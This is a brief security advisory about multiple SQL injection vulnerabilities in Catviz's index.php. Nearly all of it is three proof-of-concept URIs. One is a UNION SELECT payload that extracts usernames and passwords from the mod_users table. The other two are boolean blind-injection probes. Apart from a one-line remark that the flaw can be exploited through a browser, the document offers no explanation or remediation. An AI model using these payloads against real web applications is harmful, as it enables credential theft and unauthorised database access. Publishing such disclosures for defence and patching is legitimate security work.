Catviz 'index.php' Multiple SQL Injection Vulnerabilities

Catviz 'index.php' Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/*
http://www.example.com/index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1
http://www.example.com/index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0